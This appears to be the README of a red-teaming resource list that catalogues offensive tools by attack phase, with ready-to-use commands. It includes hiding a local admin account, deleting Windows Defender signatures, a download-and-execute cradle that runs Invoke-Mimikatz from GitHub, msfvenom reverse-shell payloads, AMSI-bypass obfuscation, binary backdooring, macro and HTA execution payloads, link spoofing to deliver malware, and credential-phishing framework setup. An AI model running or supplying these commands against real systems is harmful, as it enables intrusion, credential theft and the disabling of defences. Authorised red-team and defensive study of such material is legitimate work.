This github repository contains a collection of 130+ tools and resources that can be useful for red teaming activities.
Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.
🔗 If you are a Blue Teamer, check out BlueTeam-Tools
Warning
The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.
Note
Hide Tool List headings with the arrow.
Click 🔙 to get back to the list.
Red Team Tips 17 tips
- Hiding the local admin account @Alh4zr3d
- Cripple windows defender by deleting signatures @Alh4zr3d
- Enable multiple RDP sessions per user @Alh4zr3d
- Sysinternals PsExec.exe local alternative @GuhnooPlusLinux
- Live off the land port scanner @Alh4zr3d
- Proxy aware PowerShell DownloadString @Alh4zr3d
- Looking for internal endpoints in browser bookmarks @Alh4zr3d
- Query DNS records for enumeration @Alh4zr3d
- Unquoted service paths without PowerUp @Alh4zr3d
- Bypass a disabled command prompt with /k Martin Sohn Christensen
- Stop windows defender deleting mimikatz.exe @GuhnooPlusLinux
- Check if you are in a virtual machine @dmcxblue
- Enumerate AppLocker rules @Alh4zr3d
- CMD shortcut with 6 pixels via mspaint PenTestPartners
- Link spoofing with PreventDefault JavaScript method
- Check SMB firewall rules with Responder @malmoeb
- Disable AV with SysInternals PsSuspend @0gtweet
Reconnaissance 20 tools
- crt.sh -> httprobe -> EyeWitness Automated domain screenshotting
- jsendpoints Extract page DOM links
- nuclei Vulnerability scanner
- certSniff Certificate transparency log keyword sniffer
- gobuster Website path brute force
- feroxbuster Fast content discovery tool written in Rust
- CloudBrute Cloud infrastructure brute force
- dnsrecon Enumerate DNS records
- Shodan.io Public facing system knowledge base
- AORT (All in One Recon Tool) Subdomain enumeration
- spoofcheck SPF/DMARC record checker
- AWSBucketDump S3 bucket enumeration
- GitHarvester GitHub credential searcher
- truffleHog GitHub credential scanner
- Dismap Asset discovery/identification
- enum4linux Windows/samba enumeration
- skanuvaty Dangerously fast dns/network/port scanner
- Metabigor OSINT tool without API
- Gitrob GitHub sensitive information scanner
- gowitness Web screenshot utility using Chrome Headless
Resource Development 11 tools
- Chimera PowerShell obfuscation
- msfvenom Payload creation
- Shellter Dynamic shellcode injection tool
- Freeze Payload creation (circumventing EDR)
- WordSteal Steal NTML hashes with Microsoft Word
- NTAPI Undocumented Functions Windows NT Kernel, Native API and drivers
- Kernel Callback Functions Undocumented Windows APIs
- OffensiveVBA Office macro code execution and evasion techniques
- WSH Wsh payload
- HTA Hta payload
- VBA Vba payload
Initial Access 6 tools
- Bash Bunny USB attack tool
- EvilGoPhish Phishing campaign framework
- The Social-Engineer Toolkit Phishing campaign framework
- Hydra Brute force tool
- SquarePhish OAuth/QR code phishing framework
- King Phisher Phishing campaign framework
Execution 13 tools
- Responder LLMNR, NBT-NS and MDNS poisoner
- secretsdump Remote hash dumper
- evil-winrm WinRM shell
- Donut In-memory .NET execution
- Macro_pack Macro obfuscation
- PowerSploit PowerShell script suite
- Rubeus Active directory hack tool
- SharpUp Windows vulnerability identifier
- SQLRecon Offensive MS-SQL toolkit
- UltimateAppLockerByPassList Common AppLocker Bypass Techniques
- StarFighters JavaScript and VBScript Based Empire Launcher
- demiguise HTA encryption tool
- PowerZure PowerShell framework to assess Azure security
Persistence 4 tools
- Impacket Python script suite
- Empire Post-exploitation framework
- SharPersist Windows persistence toolkit
- ligolo-ng Tunneling tool that uses a TUN interface
Privilege Escalation 10 tools
- LinPEAS Linux privilege escalation
- WinPEAS Windows privilege escalation
- linux-smart-enumeration Linux privilege escalation
- Certify Active directory privilege escalation
- Get-GPPPassword Windows password extraction
- Sherlock PowerShell privilege escalation tool
- Watson Windows privilege escalation tool
- ImpulsiveDLLHijack DLL Hijack tool
- ADFSDump AD FS dump tool
- BeRoot Multi OS Privilege Escalation Project
Defense Evasion 8 tools
- Invoke-Obfuscation Script obfuscator
- Veil Metasploit payload obfuscator
- SharpBlock EDR bypass via entry point execution prevention
- Alcatraz GUI x64 binary obfuscator
- Mangle Compiled executable manipulation
- AMSI Fail PowerShell snippets that break or disable AMSI
- ScareCrow Payload creation framework designed around EDR bypass
- moonwalk Linux system log and filesystem timestamp remover
Credential Access 11 tools
- Mimikatz Windows credential extractor
- LaZagne Local password extractor
- hashcat Password hash cracking
- John the Ripper Password hash cracking
- SCOMDecrypt SCOM Credential Decryption Tool
- nanodump LSASS process minidump creation
- eviltree Tree remake for credential discovery
- SeeYouCM-Thief Cisco phone systems configuration file parsing
- MailSniper Microsoft Exchange Mail Searcher
- SharpChromium Cookie, history and saved login chromium extractor
- dploot DPAPI looting remotely in Python
Discovery 6 tools
- PCredz Credential discovery PCAP/live interface
- PingCastle Active directory assessor
- Seatbelt Local vulnerability scanner
- ADRecon Active directory recon
- adidnsdump Active Directory Integrated DNS dumping
- scavenger Scanning tool for scavenging systems
Lateral Movement 12 tools
- crackmapexec Windows/Active directory lateral movement toolkit
- WMIOps WMI remote commands
- PowerLessShell Remote PowerShell without PowerShell
- PsExec Light-weight telnet-replacement
- LiquidSnake Fileless lateral movement
- Enabling RDP Windows RDP enable command
- Upgrading shell to meterpreter Reverse shell improvement
- Forwarding Ports Local port forward command
- Jenkins reverse shell Jenkins shell command
- ADFSpoof Forge AD FS security tokens
- kerbrute A tool to perform Kerberos pre-auth bruteforcing
- Coercer Coerce a Windows server to authenticate
- WMIOps WMI remote commands
Collection 3 tools
- BloodHound Active directory visualisation
- Snaffler Active directory credential collector
- linWinPwn Active Directory Enumeration and Vulnerability checks
Command and Control 9 tools
- Living Off Trusted Sites Project Leverage legitimate domains for your C2
- Havoc Command and control framework
- Covenant Command and control framework (.NET)
- Merlin Command and control framework (Golang)
- Metasploit Framework Command and control framework (Ruby)
- Pupy Command and control framework (Python)
- Brute Ratel Command and control framework ($$$)
- NimPlant C2 implant written in Nim
- Hoaxshell PowerShell reverse shell
Exfiltration 5 tools
- Dnscat2 C2 via DNS tunneling
- Cloakify Data transformation for exfiltration
- PyExfil Data exfiltration PoC
- Powershell RAT Python based backdoor
- GD-Thief Google drive exfiltration
Impact 4 tools
- Conti Pentester Guide Leak Conti ransomware group affilate toolkit
- SlowLoris Simple denial of service
- usbkill Anti-forensic kill-switch
- Keytap Get pressed keyboard keys from typing audio
Learn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.
Note: Nearly all tips are currently from @Alh4zr3d, he posts good Red Team Tips!
🔙Hiding the local admin account
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f
Description: 'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'
Credit: @Alh4zr3d
Link: Twitter
🔙Cripple windows defender by deleting signatures
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Description: 'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'
Credit: @Alh4zr3d
Link: Twitter
🔙Enable multiple RDP sessions per user
reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f
Description: 'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'
Credit: @Alh4zr3d
Link: Twitter
🔙Sysinternals PsExec.exe local alternative
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "
Description: 'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'
Credit: @GuhnooPlusLinux
Link: Twitter
🔙Live off the land port scanner
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$_)) "Port $_ open"} 2>$null
Description: 'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'
Credit: @Alh4zr3d
Link: Twitter
🔙Proxy aware PowerShell DownloadString
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")
Description: 'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'
Credit: @Alh4zr3d
Link: Twitter
🔙Looking for internal endpoints in browser bookmarks
type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
Description: 'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'
Credit: @Alh4zr3d
Link: Twitter
🔙Query DNS records for enumeration
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>
Description: 'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'
Credit: @Alh4zr3d
Link: Twitter
🔙Unquoted service paths without PowerUp
Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
Description: 'Finding unquoted service paths without PowerUp'
Credit: @Alh4zr3d
Link: Twitter
🔙Bypass a disabled command prompt with /k
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"
Description: 'This command prompt has been disabled by your administrator...' Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use /k via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.
Credit: Martin Sohn Christensen
Link: Blog
🔙Stop windows defender deleting mimikatz.exe
(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv
Description: 'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'
Credit: @GuhnooPlusLinux
Link: Twitter
🔙Check if you are in a virtual machine
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"
Description: 'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'
Credit: @dmcxblue
Link: Twitter
🔙Enumerate AppLocker rules
(Get-AppLockerPolicy -Local).RuleCollections
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\
Description: 'AppLocker can be a pain. Enumerate to see how painful'
Credit: @Alh4zr3d
Link: Twitter
🔙CMD shortcut with 6 pixels via mspaint
- Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
- Zoom in to make the following tasks easier
- Using the colour picker, set pixels values to (from left to right):
- 1st: R: 10, G: 0, B: 0
- 2nd: R: 13, G: 10, B: 13
- 3rd: R: 100, G: 109, B: 99
- 4th: R: 120, G: 101, B: 46
- 5th: R: 0, G: 0, B: 101
- 6th: R: 0, G: 0, B: 0
- Save it as 24-bit Bitmap (.bmp;.dib)
- Change its extension from bmp to bat and run.
Description: 'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'
Credit: PenTestPartners
Link: Blog
🔙Link spoofing with PreventDefault JavaScript method
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>PreventDefault Example</title>
</head>
<body>
<a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a>
</body>
</html>
Description: Threat actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. Using the PreventDefault JavaScript method you can spoof the hover link to display a legit link google.com
, but once clicked the victim will be redirected to your malicious link bing.com
. Great for getting victims to download payloads via a controlled site.
Link: PreventDefault Docs
🔙Check SMB firewall rules with Responder
Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"
Description: 'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"
. If Responder could capture the hash, the firewall allows outgoing SMB connections'
Credit: @malmoeb
Link: Twitter
🔙Disable AV with SysInternals PsSuspend
Description: Using the Microsoft Sysinternals tool PsSuspend.exe it's possible to suspend some AV service executables. The Microsoft signed tool can be passed the PID or Name of a running service, it will suspend the process via the NtSuspendProcess Windows API.
Related Blog Post: Bypassing AV via Process Suspension with PsSuspend.exe
Link: Twitter
🔙crt.sh -> httprobe -> EyeWitness
I have put together a bash one-liner that:
- Passively collects a list of subdomains from certificate associations (crt.sh)
- Actively requests each subdomain to verify it's existence (httprobe)
- Actively screenshots each subdomain for manual review (EyeWitness)
Usage:
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web
Note: You must have httprobe, pup and EyeWitness installed and change 'DOMAIN_COM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains
A JavaScript bookmarklet for extracting all webpage endpoint links on a page.
Created by @renniepak, this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
Usage (Bookmarklet)
Create a bookmarklet...
Right click your bookmark bar
Click 'Add Page'
Paste the above Javascript in the 'url' box
Click 'Save'
...then visit the victim page in the browser and click the bookmarklet.
Usage (Console)
Paste the above Javascript into the console window F12
and press enter.
Fast vulnerability scanner that uses .yaml templates to search for specific issues.
Install:
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
Usage:
cat domains.txt | nuclei -t /PATH/nuclei-templates/
certSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.
You can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.
Install:
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt
Usage:
python3 certSniff.py -f example.txt
Nice tool for brute forcing file/folder paths on a victim website.
Install:
sudo apt install gobuster
Usage:
gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20
A tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.
Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...
Install: (Kali)
sudo apt update && sudo apt install -y feroxbuster
Install: (Mac)
curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash
Install: (Windows)
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V
For full installation instructions see here.
Usage:
# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
# Scan with headers
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"
# Read URLs from stdin
cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files
# Proxy requests through burpsuite
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080
Full usage examples can be found here.
Image used from https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif
A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).
Features:
- Cloud detection (IPINFO API and Source Code)
- Fast (concurrent)
- Cross Platform (windows, linux, mac)
- User-Agent Randomization
- Proxy Randomization (HTTP, Socks5)
Install:
Download the latest release for your system and follow the usage.
Usage:
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt
Image used from https://github.com/0xsha/CloudBrute
dnsrecon is a pyhton tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.
Install:
sudo apt install dnsrecon
Usage:
dnsrecon -d google.com
Shodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name, IP address it is possible to discover potentially vulnerable systems relating to your target via shodan.
Tool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.
Install:
git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt
Usage:
python3 AORT.py -d google.com
A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.
Domains are spoofable if any of the following conditions are met:
- Lack of an SPF or DMARC record
- SPF record never specifies
~all
or-all
- DMARC policy is set to
p=none
or is nonexistent
Install:
git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt
Usage:
./spoofcheck.py [DOMAIN]
AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.
Install:
git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt
Usage:
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]
optional arguments:
-h, --help show this help message and exit
-D Download files. This requires significant diskspace
-d If set to 1 or True, create directories for each host w/ results
-t THREADS number of threads
-l HOSTLIST
-g GREPWORDS Provide a wordlist to grep for
-m MAXSIZE Maximum file size to download.
python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1
Nice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.
Install:
git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester
Usage:
./githarvester.py
TruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.
Install (Binaries): Link
Install (Go):
git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install
Usage:
trufflehog https://github.com/trufflesecurity/test_keys
Dismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.
Dismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.
Install:
Dismap is a binary file for Linux, MacOS, and Windows. Go to Release to download the corresponding version to run:
# Linux or MacOS
chmod +x dismap-0.3-linux-amd64
./dismap-0.3-linux-amd64 -h
# Windows
dismap-0.3-windows-amd64.exe -h
Usage:
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24
# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json
# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10
# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000
Image used from https://github.com/zhzyker/dismap
A tool for enumerating information from Windows and Samba systems.
It can be used to gather a wide range of information, including:
- Domain and domain controller information
- Local user and group information
- Shares and share permissions
- Security policies
- Active Directory information
Install: (Apt)
sudo apt install enum4linux
Install: (Git)
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux
Usage:
# 'Do everything'
enum4linux.pl -a 192.168.2.55
# Obtain list of usernames (RestrictAnonymous = 0)
enum4linux.pl -U 192.168.2.55
# Obtain list of usernames (using authentication)
enum4linux.pl -u administrator -p password -U 192.168.2.55
# Get a list of groups and their members
enum4linux.pl -G 192.168.2.55
# Verbose scan
enum4linux.pl -v 192.168.2.55
Full usage information can be found in this blog.
Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/
Dangerously fast dns/network/port scanner, created by Esc4iCEscEsc, written in rust.
You will need a subdomains file. E.g. Subdomain wordlist by Sublist3r.
Install:
Download the latest release from here.
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists
Usage:
skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt
Image used from https://github.com/Esc4iCEscEsc/skanuvaty
Metabigor is Intelligence tool, its goal is to do OSINT tasks and more but without any API key.
Main Features:
- Searching information about IP Address, ASN and Organization.
- Wrapper for running rustscan, masscan and nmap more efficient on IP/CIDR.
- Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc).
- Get Summary about IP address (powered by @thebl4ckturtle)
Install:
go install github.com/j3ssie/metabigor@latest
Usage:
# discovery IP of a company/organization
echo "company" | metabigor net --org -o /tmp/result.txt
# Getting more related domains by searching for certificate info
echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command
# Only run rustscan with full ports
echo '1.2.3.4/24' | metabigor scan -o result.txt
# Reverse Whois to find related domains
echo 'example.com' | metabigor related -s 'whois'
# Get Google Analytics ID directly from the URL
echo 'https://example.com' | metabigor related -s 'google-analytic'
Image used from https://github.com/j3ssie/metabigor
Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github.
Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
The findings will be presented through a web interface for easy browsing and analysis.
Note: Gitrob will need a Github access token in order to interact with the Github API. Create a personal access token and save it in an environment variable in your .bashrc or similar shell configuration file:
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
Install: (Go)
go get github.com/michenriksen/gitrob
Install: (Binary)
A precompiled version is available for each release.
Usage:
# Run against org
gitrob {org_name}
# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp
# Loading session from a file
gitrob -load ~/gitrob-session.json
Image used from https://www.uedbox.com/post/58828/
Gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working.
Install: (Go)
go install github.com/sensepost/gowitness@latest
Full installation information can be found here.
Usage:
# Screenshot a single website
gowitness single https://www.google.com/
# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20
# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http
# Run the report server
gowitness report serve
Full usage information can be found here.
Image used from https://github.com/sensepost/gowitness
Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.
Install:
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help
Usage:
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p
Msfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.
Set Up Listener
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-ip
set LPORT listening-port
run
PHP:
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R
Windows:
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
Linux:
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
Java:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
HTA:
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta
Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).
Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.
Full README information can be found here.
Install: (Kali)
apt-get update
apt-get install shellter
Install: (Windows)
Visit the download page and install.
Usage:
Just pick a legit binary to backdoor and run Shellter.
Some nice tips can be found here.
Lots of community usage demos can be found here.
Image used from https://www.kali.org/tools/shellter/images/shellter.png
Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner.
Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.
Install:
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go
Usage:
-I string
Path to the raw 64-bit shellcode.
-O string
Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.
-console
Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
-encrypt
Encrypts the shellcode using AES 256 encryption
-export string
For DLL Loaders Only - Specify a specific Export function for a loader to have.
-process string
The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe")
-sandbox
Enables sandbox evasion by checking:
Is Endpoint joined to a domain?
Does the Endpoint have more than 2 CPUs?
Does the Endpoint have more than 4 gigs of RAM?
-sha256
Provides the SHA256 value of the loaders (This is useful for tracking)
Image used from https://www.blackhatethicalhacking.com/tools/freeze/
This script will create a Microsoft Word Document with a remote image, allowing for the capture of NTML hashes from a remote victim endpoint.
Microsoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image.
Install:
git clone https://github.com/0x09AL/WordSteal
cd WordSteal
Usage:
# Generate document containing 'test.jpg' and start listener
./main.py 127.0.0.1 test.jpg 1
# Generate document containing 'test.jpg' and do not start listener
./main.py 127.0.0.1 test.jpg 0\n
Image used from https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/
This site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system.
It can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation.
When developing exploits, understanding the internals of the target system is crucial. This site can help develop exploits by leveraging the low-level undocumented aspects of Windows.
Usage:
Visit http://undocumented.ntinternals.net/
Image used from http://undocumented.ntinternals.net/
This technical note provides a comprehensive list all the APIs exported by the Windows Kernel, for driver writes to register callback routines that are invoked by kernel components under various circumstances.
Most of these routines are documented in the Windows Driver Kit (WDK) but some of them are for use by in-box drivers.
The undocumented functions are described briefly whereas the documented ones are just listed here for reference.
Usage:
Visit https://codemachine.com/articles/kernel_callback_functions.html
Image used from https://codemachine.com
A collection of offensive techniques, scripts and useful links for achieving code execution and defense evasion via office macros.
Usage:
Visit https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo
Image used from https://github.com/S3cur3Th1sSh1t
🔙WSH
Creating payload:
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
Execute:
wscript payload.vbs
cscript.exe payload.vbs
wscript /e:VBScript payload.txt //If .vbs files are blacklisted
🔙HTA
Creating payload:
<html>
<body>
<script>
var c= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
Execute: Run file
🔙VBA
Creating payload:
Sub calc()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload,0
End Sub
Execute: Set function to Auto_Open() in macro enabled document
The Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.
hackinglab: Bash Bunny – Guide
evilginx2 + gophish. (GoPhish) Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. (evilginx2) Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
Install:
git clone https://github.com/fin3ss3g0d/evilgophish
Usage:
Usage:
./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool>
- root domain - the root domain to be used for the campaign
- subdomains - a space separated list of evilginx2 subdomains, can be one if only one
- root domain bool - true or false to proxy root domain to evilginx2
- redirect url - URL to redirect unauthorized Apache requests
- feed bool - true or false if you plan to use the live feed
- rid replacement - replace the gophish default "rid" in phishing URLs with this value
- blacklist bool - true or false to use Apache blacklist
Example:
./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
This framework is great for creating campaigns for initial access, 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.
Install:
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install
Usage:
python3 setoolkit
